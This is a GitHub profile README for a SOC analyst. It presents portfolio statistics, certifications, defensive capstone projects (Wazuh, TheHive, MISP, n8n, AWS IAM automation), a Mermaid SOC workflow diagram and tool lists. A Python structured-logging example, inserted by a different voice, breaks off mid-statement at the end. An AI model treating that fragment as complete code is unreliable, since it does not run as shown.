abdul4rehman215/README.md

Hi, I'm Abdul Rehman


🛡 SOC Analyst • 🔍 Detection Engineering • ⚙️ Security Automation • ☁️ AWS Security • 🤖 AI-Driven SOC

Telemetry → Detection → Enrichment → Case Management → Automation → Feedback



🌐 Connect with Me


👨‍💻 About Me

Name: Abdul Rehman
Role: SOC Analyst | Cybersecurity Analyst | Security Automation Builder
Location: Bengaluru, India 🇮🇳

Primary Focus:
  - SOC Operations & SIEM Monitoring
  - Detection Engineering & Alert Triage
  - Incident Response & Case Workflows
  - AWS Security Monitoring & IAM Automation
  - SOAR Workflows with Wazuh, TheHive, MISP, Cortex, n8n
  - AI-Assisted Security Operations

Current Growth Tracks:
  - Defensive Security Engineering
  - Advanced SOC Operations
  - DevSecOps & Cloud Security
  - AI-Driven Security Operations
  - AI Automation & Agentic Workflows
  - Cybersecurity + AI Practical Lab Roadmap

Approach: Build → Detect → Investigate → Automate → Document → Improve
Philosophy: Automate Everything
Goal: Strengthen security operations through practical automation and AI-assisted workflows
🌐 Open to remote roles & freelance

I’m a hands-on cybersecurity practitioner focused on SOC operations, SIEM monitoring, detection engineering, AWS security, incident response workflows, and open-source security tooling.

My portfolio is built around real lab execution and deep documentation — not just learning tools, but deploying, validating, investigating, automating, documenting, and improving complete technical environments.

Over time, I’ve built and documented work across:

  • SOC & SIEM operations
  • Wazuh-based monitoring, detection, and alert triage
  • TheHive, MISP, Cortex, and n8n-based SOAR workflows
  • AWS security monitoring, IAM automation, and secure cloud infrastructure
  • Linux security hardening, administration, and troubleshooting
  • Incident response simulations, containment workflows, and case documentation
  • Python automation, DevSecOps-style validation, and observability workflows
  • AI-assisted SOC workflows, GenAI security operations, MCP/RAG learning, and agentic automation experiments
  • Data science, machine learning, NLP, and analytics foundations for security-adjacent analysis

I also completed a full-year student internship alongside my cybersecurity studies and continue building a large, structured GitHub portfolio through completed labs, specialist repositories, capstone-style projects, and an active long-term hands-on learning roadmap.


📌 Portfolio Snapshot

| 🔐 Portfolio Dimension | 📈 What It Reflects |
| --- | --- |
| 28 structured repositories | Specialist tracks, capstones, guided labs, learning portfolios, and documentation-first technical projects |
| 700+ completed hands-on labs & projects | Practical execution already completed across cybersecurity, Linux, cloud, automation, analytics, AI, and security operations |
| 720-lab advanced roadmap | Active next-stage roadmap across blue team, red team, DFIR, cloud security, DevSecOps, AI security, ML, automation, and advanced cyber labs |
| SOC/SOAR flagship ecosystem | 42+ projects, 6 capstones, 11 installations/setups, 6 dashboards, and connected Wazuh + TheHive + MISP + Cortex + n8n workflows |
| Cloud security engineering | AWS IAM security automation, secure infrastructure MVP, CloudTrail, GuardDuty, Config, Security Hub, VPC Flow Logs, and monitoring pipelines |
| AI-assisted security automation | GenAI detection-as-code, MCP/RAG/agentic AI security workflows, Hugging Face agents, LangChain RAG, and n8n-based SOC automation |
| Python, data & automation depth | 57-lab Data Science portfolio and 39-lab Python automation/security engineering portfolio |
| Documentation-first mindset | READMEs, architecture diagrams, workflow mapping, interview Q&A, troubleshooting, evidence packs, and technical reporting |

📊 Full Skill Matrix

This matrix reflects my portfolio-wide hands-on implementation across SOC operations, SIEM, Linux security, AWS monitoring, incident response, security automation, AI-assisted security workflows, Python engineering, and analytics.

Depth labels are evidence-based and reflect completed repositories, capstones, labs, workflow prototypes, and documented hands-on projects.

| Skill Area | Portfolio Evidence | Current Depth | Tools / Frameworks Used |
| --- | --- | --- | --- |
| 🛡️ SOC Operations & Alert Triage | Alert triage, investigation logic, false-positive review, escalation context, analyst-style documentation | High portfolio depth | Wazuh, TheHive, MITRE ATT&CK |
| 📊 SIEM Monitoring & Detection Engineering | Wazuh monitoring, custom rules, decoders, FIM, telemetry validation, tuning, and detection-focused workflows | High portfolio depth | Wazuh, ELK, Kibana, Sysmon, auditd |
| 🧾 Incident Response & Case Documentation | Alert-to-case thinking, timelines, containment notes, response lifecycle, lessons learned, closure documentation | Strong applied exposure | TheHive, Cortex, MISP, SOC reporting workflows |
| 🧠 Threat Intelligence & ATT&CK Mapping | IOC enrichment, ATT&CK mapping, observable handling, case context, threat-intel feedback loops | Strong applied exposure | MISP, Cortex, VirusTotal, AlienVault OTX, MITRE ATT&CK |
| 🐧 Linux Security & System Hardening | SSH hardening, permissions, services, auditing, logging, firewalling, credential access monitoring | High portfolio depth | Linux, Ubuntu, Debian, RHEL, auditd, ufw, fail2ban |
| ☁️ AWS Security Monitoring & Cloud Visibility | CloudTrail monitoring, IAM activity review, GuardDuty/Security Hub-style workflows, cloud event visibility | Strong applied exposure | AWS, CloudTrail, IAM, GuardDuty, Security Hub, AWS CLI |
| ☁️ AWS Security Engineering & IAM Automation | IAM triage, containment workflows, scheduled IAM hygiene, secure infrastructure MVPs, assessment/remediation automation | Growing specialist depth | AWS IAM, Security Hub, GuardDuty, CloudTrail, Config, VPC Flow Logs |
| 🧬 GenAI Security & Detection-as-Code | AI-app telemetry detection, Wazuh rule CI/CD, MCP/RAG/agentic runtime triage, OWASP LLM mapping | Applied / growing depth | Wazuh, GitHub PRs, n8n, TheHive, Slack, OWASP LLM, MCP, RAG |
| ⚙️ Python Security Automation & DevSecOps | CLI tooling, config validation, testing, backend orchestration, workflow state, logs, metrics, incident-support automation | Strong applied exposure | Python, Bash, FastAPI, Flask, pytest, PostgreSQL, Redis, Prometheus, Grafana |
| 🤖 AI Automation, Agents, MCP & RAG | n8n workflows, prompt/context design, LangChain RAG apps, Hugging Face agents, MCP servers, tool-use workflows | Applied / growing depth | n8n, LangChain, Hugging Face, FastMCP, smolagents, LlamaIndex, LangGraph |
| 🧪 Vulnerability Assessment & Security Validation | Vulnerability review, scan interpretation, hardening validation, posture improvement, remediation thinking | Strong applied exposure | Nessus, OpenVAS, Checkov, CIS concepts, OWASP ZAP |
| 🌐 Web / Network Security Observation | Traffic review, service visibility, WAF monitoring, IDS/NSM visibility, web log observation | Solid working depth | Wireshark, Nmap, Burp Suite, OWASP ZAP, Nginx, Suricata, Snort, Zeek |
| 🎩 RHEL, Containers & Admin Automation | Enterprise-style administration exposure, container workflows, operational consistency, system management | Solid working depth | RHEL, Podman, Docker, Kubernetes, OpenShift |
| 📈 Data Analytics, ML/NLP & Security-Oriented Analysis | Data handling, visualization, statistics, ML/NLP foundations, forecasting, deep learning foundations | Solid working depth | Jupyter, Pandas, NumPy, Matplotlib, scikit-learn, TensorFlow, PyTorch |

🔍 Depth Scale

  • High portfolio depth = repeated implementation across multiple repositories, labs, capstones, and documented workflows
  • Strong applied exposure = clear practical project evidence with hands-on implementation and technical documentation
  • Growing specialist depth = active specialization supported by recent capstone or repository work
  • Applied / growing depth = hands-on projects completed, with continued expansion underway
  • Solid working depth = practical foundation with documented labs and ongoing growth

This matrix reflects overall portfolio capability, not one isolated repository — covering:

SOC → Detection → Investigation → Enrichment → Hardening → Monitoring → Automation → Documentation → Continuous Improvement


🎯 Core Focus Areas

| 🧭 Domain | 🔍 Focus |
| --- | --- |
| SOC Operations | alert triage, case context, event analysis, escalation thinking, documentation, and analyst workflow discipline |
| SIEM & Detection Engineering | Wazuh monitoring, rules, decoders, FIM, telemetry validation, detection tuning, and alert quality improvement |
| Incident Response Workflows | investigation flow, containment logic, IOC enrichment, MITRE ATT&CK mapping, reporting, and lessons learned |
| Threat Intelligence & Case Enrichment | MISP, Cortex, VirusTotal, OTX, observable context, case comments, and threat-intel feedback loops |
| Linux Security | hardening, SSH security, permissions, auditing, services, endpoint visibility, and system defense |
| AWS Security & IAM Automation | CloudTrail, IAM activity, GuardDuty, Security Hub, Config, identity triage, containment, and hygiene monitoring |
| Secure Cloud Infrastructure | segmented AWS architecture, bastion access, encrypted logging, monitoring controls, validation, and remediation |
| Security Automation / SOAR | n8n, Slack, TheHive, DataTables, workflow state, alert-to-case automation, and closure synchronization |
| AI Security & GenAI Detection | AI-app telemetry, OWASP LLM mapping, MCP/RAG/agentic runtime detection, Wazuh detection-as-code, and SOC triage prototypes |
| Python Automation & DevSecOps | secure CLI tooling, backend orchestration, validation, testing, observability, metrics, and evidence generation |
| Security Analytics | data thinking, statistics, ML/NLP foundations, dashboards, forecasting, and security-oriented analytical reasoning |

🚀 Featured Portfolio Highlights

| Highlight | What It Shows |
| --- | --- |
| 🛡 End-to-End SOC + SOAR Ecosystem on AWS | Connected security operations lab using Wazuh, TheHive, MISP, Cortex, n8n, AWS, dashboards, case workflows, and analyst-style documentation |
| 🔎 Detection Engineering & Cyber Defense Portfolio | Endpoint, network, web, cloud, Linux, Windows, Wazuh rules/decoders, validation workflows, and alert-quality improvement |
| ☁️ AWS Security & IAM Automation | CloudTrail visibility, IAM triage, GuardDuty/Security Hub-style workflows, secure infrastructure, Config, VPC Flow Logs, and remediation automation |
| 🧬 GenAI Detection-as-Code & AI Security Workflows | Wazuh CI/CD, GitHub PR validation, OWASP LLM mapping, MCP/RAG/agentic runtime telemetry, Slack, TheHive, n8n, and audit tables |
| ⚙️ Python Automation, DevSecOps & Observability | 39-lab Python automation engineering portfolio covering CLI tools, backend workflows, testing, logs, metrics, compliance evidence, and AI-assisted runbooks |
| 📊 Data Science, ML/NLP & Analytics Foundations | 57-lab Data Science portfolio covering Python, pandas, NumPy, visualization, statistics, ML, NLP, forecasting, TensorFlow, and PyTorch |
| 🤗 AI, Hugging Face, LangChain & MCP Learning | Hugging Face Agents/LLM/MCP tracks, LangChain RAG app work, MCP automation workflows, AI agents, and source-grounded chatbot development |
| 📝 Documentation-First Portfolio Discipline | Strong READMEs, architecture diagrams, troubleshooting notes, interview Q&A, evidence packs, project reports, and technical storytelling |

🚀 Future Vision

I am working toward becoming a stronger cybersecurity professional who can improve security operations through defensive engineering, automation, cloud security, and practical AI-assisted workflows.

My long-term direction is to build useful security systems that connect:

  • SOC monitoring and detection engineering
  • incident response and case workflow discipline
  • cloud security, IAM visibility, and DevSecOps-style validation
  • Python automation, observability, and evidence-driven reporting
  • AI-assisted triage, agentic workflows, MCP/RAG learning, and human-in-the-loop automation

The goal is not to automate everything blindly. The goal is to automate the repetitive, high-context, and evidence-heavy work that can help analysts move faster while keeping security decisions explainable and reviewable.


🛠 Technical Skills


☁️ Cloud & Platform Security

🐳 Containers & Runtime

🔐 Security, SOC & Threat Detection

📊 SIEM, Logging & Case Management

🌐 Networking & Traffic Analysis

🐧 Operating Systems

🧪 Programming, Automation & Analysis

🧩 Backend, DevSecOps & Observability

☕ Java & Integration Development

🤖 AI Automation, Agentic Workflows & Prompting

📈 Data Science, ML & Security Analytics


🛡 What I Work On

| Area | Practical Work |
| --- | --- |
| 🔍 SOC Operations & SIEM Monitoring | Alert triage, log analysis, Wazuh monitoring, detection review, escalation logic, and analyst-ready notes |
| 🧠 Threat Intelligence & Case Context | IOC enrichment, MISP/Cortex workflows, VirusTotal/OTX checks, ATT&CK mapping, and case comments |
| 🐧 Linux Security & Administration | Hardening, permissions, SSH security, audit visibility, services, logs, firewalling, and troubleshooting |
| ☁️ AWS Security & IAM Automation | CloudTrail visibility, IAM event review, identity triage, hygiene checks, GuardDuty/Security Hub-style workflows |
| 🏰 Secure Cloud Infrastructure | Segmented AWS architecture, bastion patterns, least-privilege IAM, encrypted logging, assessment, remediation, and monitoring controls |
| 🧬 GenAI Detection-as-Code | Wazuh detection CI/CD, AI-app telemetry, OWASP LLM mapping, MCP/RAG/agentic alert routing, and TheHive case workflows |
| 🤖 AI Automation & n8n Workflows | Prompt/context design, Slack notifications, analyst summaries, workflow orchestration, DataTables, and closure sync |
| ⚙️ Python Automation & DevSecOps | CLI tools, API services, validation gates, testing, drift checks, logs, metrics, dashboards, and evidence generation |
| 📊 Data Science & ML/NLP Foundations | Python analytics, data cleaning, visualization, statistics, ML/NLP basics, forecasting, and model-evaluation practice |

🏅 Certifications & Professional Training

☁️ Cloud, Cybersecurity & Governance

  • Cloud Cyber Security Certificate, Al-Nafi International College (issued Jan 2026)
  • EduQual RQF Level 3 Diploma in Cloud Cyber Security, Al-Nafi International College
  • Cyber Security Internship, Al-Nafi International College
  • CISSP-aligned Training, Al-Nafi International College
  • Certified in Cybersecurity (CC), ISC2
  • ISO/IEC 27001:2022 Lead Auditor, Mastermind
  • Certified Fundamentals in Cybersecurity, Fortinet

🛡️ SOC, Threat Intelligence, Job Simulations & Security Practice

  • SOC Analyst & Cybersecurity Job Simulations, Forage (TATA, Deloitte, AIG, Datacom, Telstra, Commonwealth Bank)
  • Certified Phishing Prevention Specialist (CPPS), Hack & Fix
  • Certified Threat Intelligence & Governance Analyst (CTIGA), Red Team Leaders
  • Certified Red Team Operations Management (CRTOM), Red Team Leaders
  • Cybersecurity Fundamentals, SOC in Practice, Enterprise Security, Threat Intelligence & Hunting, IBM SkillsBuild

🤖 AI, MCP, Agents & Automation

  • Hugging Face AI Learning Tracks: Agents Course, LLM Fundamentals, Fundamentals of MCP, MCP for Production Automation
  • Anthropic AI Fluency & Claude Learning: AI Fluency, Claude 101, Claude Code 101, Claude Code in Action, Claude Cowork
  • Anthropic MCP / Agentic Workflow Certificates: Introduction to MCP, MCP Advanced Topics, Subagents, Agent Skills
  • AI Masterclass & Workshops: Dhruv Rathee Academy, GrowthSchool, be10x
  • AWS DevOps and Agentic AI Masterclass, Train with Shubham

📊 Data, Analytics & Technical Foundations

  • Data Analytics Essentials, Cisco Networking Academy
  • Introduction to Data Science, Cisco Networking Academy


💼 Professional Focus

🧭 Current Strengths: SOC Operations, Defensive Security & Automation

  • SOC alert monitoring, triage, investigation logic, and analyst-style documentation
  • SIEM monitoring and detection engineering using Wazuh, rules, decoders, and telemetry validation
  • Threat detection, IOC context, enrichment, and MITRE ATT&CK mapping
  • Incident escalation, case workflow documentation, containment thinking, and closure tracking
  • Linux security, log analysis, hardening, audit visibility, and operational administration
  • AWS monitoring and identity-security workflow exposure through CloudTrail, IAM, GuardDuty, Security Hub, and Config-style projects
  • Open-source SOC ecosystem implementation with Wazuh + TheHive + MISP + Cortex + n8n
  • Python/Bash automation, workflow support, and documentation-first project execution

🚀 Areas I’m Actively Advancing: Security Growth, Engineering Depth & AI Automation Direction

  • Deepening detection logic, alert quality tuning, and stronger SOC decision-making
  • Expanding Wazuh depth through custom rules, decoders, deployment control, regression testing, and dashboard visibility
  • Advancing cloud security engineering around AWS IAM, secure infrastructure, posture monitoring, and remediation workflows
  • Building stronger Python automation, DevSecOps validation, backend workflow services, observability, and evidence generation
  • Growing in GenAI security workflows, detection-as-code, MCP/RAG/agentic AI risk detection, and AI-app telemetry monitoring
  • Learning advanced AI workflow implementation with Hugging Face, LangChain, MCP, agents, and human-in-the-loop automation
  • Working through a new 720-lab advanced roadmap across blue team, red team, DFIR, cloud security, DevSecOps, AI, ML, and automation domains
  • Strengthening documentation quality, project storytelling, architecture explanation, and portfolio presentation
  • Moving toward stronger cybersecurity practice through reliable, explainable, and practical AI-assisted security automation

🚀 Featured Capstone Projects

🛡️ SOC + SOAR Malware Incident Response

🔎 Alert → Investigation → Case → Threat Intel
  • Built a complete SOC/SOAR malware investigation workflow on AWS
  • Used Windows endpoint telemetry, Sysmon, Wazuh, TheHive, Cortex, and MISP
  • Practiced triage, validation, enrichment, ATT&CK mapping, case handling, and IOC sharing
  • Documented the full incident lifecycle in an interview-ready portfolio format

GitHub SOC SOAR Capstone

🤖 AI-Driven SOC Alert Triage Automation

⚙️ Wazuh → n8n → Gemini → Analyst Report
  • Forwarded Wazuh alerts into n8n for AI-assisted triage
  • Normalized alert context and generated analyst-ready summaries using Gemini
  • Focused on reducing manual triage effort and improving decision support
  • Practiced prompt/context design for SOC workflow acceleration

GitHub AI SOC Triage

☁️ AWS IAM Identity Security Automation

🔐 Identity Finding → Enrichment → Containment → Closure
  • Designed a four-flow AWS IAM security automation prototype
  • Connected identity triage, IAM enrichment, access-key containment, TheHive alert/case handling, and closure sync
  • Used n8n, AWS GuardDuty/Security Hub/IAM/CloudTrail concepts, Slack, DataTable, and TheHive 5
  • Demonstrated SOC lifecycle thinking for cloud identity incidents and IAM hygiene monitoring

GitHub AWS IAM Capstone

🏰 Secure AWS Infrastructure MVP

🧱 Build → Govern → Assess → Remediate → Monitor
  • Built a secure-by-design AWS infrastructure MVP using a layered defense model
  • Implemented public/private subnet separation, bastion access, IAM guardrails, encrypted logging, and monitoring controls
  • Used Terraform, Python automation, Checkov, CloudTrail, VPC Flow Logs, AWS Config, GuardDuty, EventBridge, and SNS
  • Focused on secure cloud architecture, validation, remediation, and continuous visibility

GitHub Secure AWS MVP

🧬 GenAI Detection-as-Code CI/CD for Wazuh

🚦 Detection Code → CI Gate → Wazuh Deploy → Runtime Triage
  • Built a GenAI security detection-as-code prototype for Wazuh
  • Validated Wazuh XML, Sigma, metadata, mappings, and replay logic through GitHub PR workflows
  • Created controlled deployment gates, runtime GenAI alert triage, Slack notifications, TheHive alerts/cases, and audit tables
  • Mapped prompt-injection and output-handling detections to OWASP LLM and MITRE ATLAS-style context

GitHub GenAI DaC CI/CD

🧠 GenAI Detection-as-Code V2 — MCP, RAG & Agentic AI

🧩 MCP Tool Risk → RAG/Memory Risk → Agentic Runtime Risk
  • Extended the GenAI detection-as-code model into MCP, RAG/memory, and agentic AI security workflows
  • Built Flow A2/B2/C2 style validation, deployment, and runtime triage logic using GitHub, Wazuh, n8n, Slack, TheHive, and DataTables
  • Added MCP policy monitoring, red-team replay regression, false-positive analytics, and SOC posture metrics
  • Documented prototype boundaries honestly while showing practical AI-security engineering depth

GitHub GenAI DaC V2


🏗️ Capstone Architecture & Workflow

This section highlights the original SOC / SOAR malware investigation architecture, analyst workflow, and threat-intelligence feedback loop using Wazuh, TheHive, Cortex, MISP, AWS, and Sysmon. The featured capstone table above shows how the portfolio has expanded further into AWS IAM automation, secure AWS infrastructure, GenAI detection-as-code, MCP/RAG security, and agentic AI-assisted security operations.

🔍 End-to-End SOC Analyst Workflow

SOC Analyst End-to-End Workflow

🧩 View SOC / SOAR Architecture Pipeline Diagram

SOC SOAR Architecture Workflow

📐 Mermaid Workflow Diagram

```mermaid
flowchart LR
  %% =========================================================
  %% SOC + SOAR + TI — End-to-End Workflow (Swimlanes, Boxed)
  %% with stronger lane separators (GitHub Mermaid friendly)
  %% =========================================================

  A_ENR[" "]:::anchor
  A_IR[" "]:::anchor
  A_TI[" "]:::anchor
  A_FB1[" "]:::anchor
  A_FB2[" "]:::anchor

  F1[" "]:::frame
  F2[" "]:::frame
  F3[" "]:::frame
  F4[" "]:::frame
  F5[" "]:::frame
  F6[" "]:::frame

  F1 -.-> F2
  F2 -.-> F3
  F3 -.-> F4
  F4 -.-> F5
  F5 -.-> F6

  subgraph L1[" "]
    direction TB
    H1["🪟 Endpoint"]:::laneHeader
    SIM["🧨 Controlled Attack Simulation<br/>PowerShell • DNS • File Drop • Persistence • Network"]:::stage
    ENDPOINT["Sysmon + Wazuh Agent<br/>Telemetry collection"]:::stage
    H1 --> SIM --> ENDPOINT --> F1
  end

  subgraph L2[" "]
    direction TB
    H2["🛡️ SIEM / XDR (Wazuh)"]:::laneHeader
    WAZ["Wazuh Manager<br/>Rules • Correlation • Alerts"]:::stage
    IDX["Wazuh Indexer<br/>OpenSearch"]:::stage
    WDASH["Wazuh Dashboard<br/>Hunting • Evidence • Discover"]:::stage
    H2 --> WAZ --> IDX --> WDASH --> F2
  end

  subgraph L3[" "]
    direction TB
    H3["👨‍💻 SOC Analyst"]:::laneHeader
    ANALYST["Triage + Investigation<br/>Review ➜ Correlate ➜ Extract IOCs"]:::human
    GATE["Decision Gate<br/>True Positive confirmed?"]:::decision
    H3 --> ANALYST --> GATE --> F3
  end

  subgraph L4[" "]
    direction TB
    H4["🗂️ Case Mgmt + SOAR (TheHive + Cortex)"]:::laneHeader
    THEHIVE["TheHive Case<br/>Alert ➜ Case ➜ Tasks ➜ Timeline"]:::stage
    OBS["Observables / IOCs<br/>Hash • Domain • IP • URL • File • Registry"]:::stage
    CORTEX["Cortex Automation<br/>Analyzers / Responders"]:::stage
    ENR["Enrichment Results<br/>VT • OTX • MISP lookups etc."]:::stage
    MITRE["MITRE ATT&CK Mapping<br/>Evidence ➜ Techniques ➜ TTPs"]:::stage

    H4 --> THEHIVE --> OBS --> A_ENR
    A_ENR --> CORTEX --> ENR --> A_ENR
    ENR --> THEHIVE
    THEHIVE --> MITRE --> A_IR --> F4
  end

  subgraph L5[" "]
    direction TB
    H5["🛠️ Incident Response"]:::laneHeader
    IRFLOW["IR Lifecycle<br/>Identify ➜ Analyze ➜ Contain ➜ Eradicate ➜ Recover ➜ Review"]:::ir
    ACTIONS["Endpoint Actions<br/>Triage • Kill proc • Block C2 • Remove persistence • Export EVTX"]:::action
    CLOSE["Case Closure<br/>Final report • Timeline • Metrics • Lessons learned"]:::outcome

    H5 --> IRFLOW --> ACTIONS --> IRFLOW
    IRFLOW --> CLOSE --> A_TI --> F5
  end

  subgraph L6[" "]
    direction TB
    H6["🧠 Threat Intelligence (MISP)"]:::laneHeader
    MISP["MISP Event<br/>Validated IOCs + Tags + Context"]:::ti
    SHARE["Share / Reuse<br/>Correlation • Community • Future detections"]:::ti
    H6 --> MISP --> SHARE --> F6
  end

  ENDPOINT -->|📤 Sysmon telemetry| WAZ
  WDASH --> ANALYST
  GATE -->|📌 Escalate IOCs + evidence| THEHIVE
  A_IR --> IRFLOW
  A_TI -->|✅ Export validated IOCs| MISP

  SHARE -.-> A_FB1 -.->|♻️ Improve detections| WAZ
  SHARE -.-> A_FB2 -.->|🔍 Faster correlation| WDASH

  OUT["🏁 Outcome<br/>End-to-end SOC workflow + SOAR automation + TI feedback loop"]:::outcome
  CLOSE --> OUT

  classDef laneHeader fill:#0b1220,stroke:#94a3b8,stroke-width:3px,stroke-dasharray: 6 4,color:#e5e7eb;
  classDef stage fill:#111827,stroke:#475569,stroke-width:1px,color:#e5e7eb;
  classDef human fill:#0f172a,stroke:#22c55e,stroke-width:1px,color:#e5e7eb;
  classDef decision fill:#0f172a,stroke:#f59e0b,stroke-width:2px,color:#e5e7eb;
  classDef ir fill:#0f172a,stroke:#60a5fa,stroke-width:1px,color:#e5e7eb;
  classDef action fill:#0f172a,stroke:#ef4444,stroke-width:1px,color:#e5e7eb;
  classDef ti fill:#0f172a,stroke:#a78bfa,stroke-width:1px,color:#e5e7eb;
  classDef outcome fill:#0f172a,stroke:#14b8a6,stroke-width:2px,color:#e5e7eb;

  classDef anchor fill:transparent,stroke:transparent,color:transparent;
  classDef frame fill:transparent,stroke:transparent,color:transparent;

  class A_ENR,A_IR,A_TI,A_FB1,A_FB2 anchor;
  class F1,F2,F3,F4,F5,F6 frame;

  linkStyle 0 stroke:#94a3b8,stroke-width:4px,stroke-dasharray:10 6,opacity:0.95;
  linkStyle 1 stroke:#94a3b8,stroke-width:4px,stroke-dasharray:10 6,opacity:0.95;
  linkStyle 2 stroke:#94a3b8,stroke-width:4px,stroke-dasharray:10 6,opacity:0.95;
  linkStyle 3 stroke:#94a3b8,stroke-width:4px,stroke-dasharray:10 6,opacity:0.95;
  linkStyle 4 stroke:#94a3b8,stroke-width:4px,stroke-dasharray:10 6,opacity:0.95;
```


🔧 Complete Toolset Reference

🛠️ Monitoring, Detection & Logging Arsenal

🔎 SIEM & Monitoring Platforms

  • Wazuh — SIEM/XDR, endpoint monitoring, FIM, vulnerability detection, custom rules, decoders, and alert routing
  • ELK Stack — Elasticsearch, Logstash, Kibana
  • OpenSearch — dashboarding and search-style visibility exposure
  • Kibana — dashboards, visualization, and security monitoring views
  • Splunk — log analysis and operational visibility
  • CloudTrail — AWS activity visibility and event review
  • VPC Flow Logs — cloud network visibility
  • AWS Config — compliance posture and configuration visibility
  • GuardDuty / Security Hub — AWS security finding and routing concepts

🗂️ Log Collection & Analysis

  • Elasticsearch — log indexing and search
  • Logstash — ingestion and parsing
  • Wazuh Decoders & Rules — event classification and alerting logic
  • Wazuh Custom Integrations — forwarding security alerts into automation workflows
  • auditd — Linux audit logging
  • Sysmon / Sysmon for Linux — endpoint telemetry and event visibility
  • Osquery — endpoint state inspection and threat-hunting visibility
  • Syslog / Linux Logs — operational and security visibility
  • Alert Tuning Concepts — relevance filtering and signal improvement

🧠 Threat Intelligence & SOC Context

  • TheHive 5 — incident, alert, case, task, comment, and lifecycle management
  • MISP — IOC enrichment and sharing concepts
  • Cortex — analyzer-oriented enrichment support
  • VirusTotal / AlienVault OTX — external IOC enrichment
  • MITRE ATT&CK — technique mapping and analyst context
  • MITRE ATLAS-style mapping — AI threat-context language for GenAI security detections
  • OWASP LLM / GenAI Security — LLM risk classification and AI-app security reference
  • OWASP MCP — MCP-specific AI tool-risk reference

🔒 Network Security, Traffic Analysis & Security Testing Tools

🛡️ Network Security

  • pfSense — firewall and network edge concepts
  • Nginx / Apache — web stack exposure and log visibility
  • ModSecurity + OWASP CRS — WAF detection and web attack monitoring
  • Fail2Ban — automated host-level blocking for repeated attack behavior
  • Wireshark — traffic inspection and packet analysis
  • tcpdump — packet capture and CLI-based visibility
  • Nmap — service enumeration and discovery
  • Suricata / Snort / Zeek — IDS/NSM visibility, alerting, and protocol-aware detection

🔍 Vulnerability & Security Assessment

  • OpenVAS — vulnerability scanning exposure
  • Qualys — cloud security and assessment awareness
  • Nessus — vulnerability review
  • Burp Suite — web security testing workflows
  • OWASP ZAP — web application testing exposure
  • Checkov — infrastructure-as-code security scanning
  • CIS concepts — baseline hardening and control awareness

🔴 Security Testing / Detection Validation

  • Metasploit — offensive simulation in lab contexts
  • Kali Linux — testing and research environment
  • Atomic Red Team concepts — adversary emulation awareness
  • VirusTotal — file/hash/domain/IP enrichment
  • Custom replay/test events — detection validation and regression thinking

💻 Command Line, Systems, Containers & Automation Stack

☁️ Cloud & Infra Tools

  • AWS CLI — cloud interaction and operational support
  • AWS IAM — identity, access, policy, and credential hygiene workflows
  • AWS EC2 / VPC / S3 / CloudWatch — cloud lab operations and monitoring
  • Terraform — infrastructure-as-code for secure AWS MVP design
  • EventBridge / SNS — cloud event routing and notification concepts
  • Ansible — automation and repeatable administration
  • n8n — workflow orchestration and SOC/SOAR automation

🐳 Container Tools

  • Docker — container workflows
  • Podman — daemonless containers
  • kubectl — Kubernetes CLI exposure
  • OpenShift — enterprise container platform exposure

📜 Scripting & Admin

  • Linux CLI — core administration and troubleshooting
  • bash — automation and shell scripting
  • PowerShell — Windows-side scripting exposure
  • python — scripting, analytics, backend services, and automation
  • vim / nano — CLI editing
  • systemctl / journalctl — service and log management
  • iptables / ufw — firewall and containment actions

🔍 Networking Utilities

  • curl — HTTP / API checks
  • wget — downloads and testing
  • netcat (nc) — networking utility
  • dig — DNS lookup utility
  • traceroute — path tracing
  • ping — connectivity validation
  • ip / ss / netstat — network inspection

🔐 Security Utilities

  • ssh — secure access and admin workflows
  • openssl — SSL/TLS tooling
  • fail2ban — brute-force mitigation
  • ufw — firewall management
  • SELinux / AppArmor — access control and hardening exposure

🧩 Python Automation, DevSecOps & Observability Stack

⚙️ Python Automation Engineering

  • Python — CLI tooling, scripts, data processing, workflow support, and service logic
  • Bash — repeatable execution, validation scripts, and lab automation
  • FastAPI / Flask — API services, policy/status endpoints, and integration workflows
  • PostgreSQL — workflow state, job registry, and queryable job history
  • Redis — queueing and worker-support patterns
  • pytest / coverage — testing, validation, and quality gates
  • pre-commit — local quality gate and security checks

📦 Delivery, Validation & Governance

  • GitHub / GitHub Actions — PR workflows, validation signals, CI-style automation, and documentation versioning
  • Artifact versioning — repeatable delivery and rollback-aware workflow thinking
  • Configuration validation — schema checks, drift detection, golden config enforcement
  • Policy engineering — automation guardrails, rule enforcement, and compliance evidence

📈 Observability & Evidence

  • Structured Logging — correlation IDs, JSON logs, and operational traceability
  • Prometheus — metrics instrumentation
  • Grafana — dashboard evidence and operational visualization
  • Runbooks / Reports — incident support, CI triage, evidence generation, and documentation
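
As an added illustration of the "correlation IDs, JSON logs, and operational traceability" bullet above (this is example code written for this page, not the author's tooling), the block below logs every stage of one alert's triage as a JSON line that carries the same correlation ID, so a SIEM or Grafana/Loki query can stitch the stages of one job back together. The alert fields, rule ID and enrichment result are constructed; a real enrichment step would query MISP or Cortex. The correlation ID lives in a contextvar so concurrent jobs do not overwrite each other's ID.

```python
"""Structured JSON logging with a correlation ID carried across every step of one job."""
import json
import logging
import uuid
from contextvars import ContextVar
from io import StringIO

# One correlation ID per unit of work (here: one alert moving through triage).
# contextvars keeps it per-task, so concurrent jobs do not overwrite each other.
_correlation_id: ContextVar[str] = ContextVar("correlation_id", default="-")


def new_correlation_id() -> str:
    cid = uuid.uuid4().hex[:16]
    _correlation_id.set(cid)
    return cid


class JsonFormatter(logging.Formatter):
    """Emit one JSON object per line: fixed keys first, then per-event fields."""

    def format(self, record: logging.LogRecord) -> str:
        event = {
            "ts": self.formatTime(record, "%Y-%m-%dT%H:%M:%S"),
            "level": record.levelname,
            "logger": record.name,
            "correlation_id": _correlation_id.get(),
            "msg": record.getMessage(),
        }
        # Structured per-event fields arrive through logging's `extra` mechanism.
        fields = getattr(record, "fields", None)
        if fields:
            event.update(fields)
        if record.exc_info:
            event["exception"] = self.formatException(record.exc_info)
        return json.dumps(event, sort_keys=True)


def build_logger(name: str, stream) -> logging.Logger:
    logger = logging.getLogger(name)
    logger.handlers.clear()  # idempotent: re-running does not stack handlers
    logger.propagate = False
    logger.setLevel(logging.INFO)
    handler = logging.StreamHandler(stream)
    handler.setFormatter(JsonFormatter())
    logger.addHandler(handler)
    return logger


def triage_alert(alert: dict, stream=None) -> list[dict]:
    """Toy triage pipeline: logs each stage, returns the parsed JSON events it wrote."""
    buf = stream if stream is not None else StringIO()
    log = build_logger("soc.triage", buf)
    new_correlation_id()

    log.info("alert received",
             extra={"fields": {"alert_id": alert["id"], "rule_id": alert["rule_id"]}})
    # Enrichment result is constructed for the example (no external lookup is made).
    log.info("enrichment complete",
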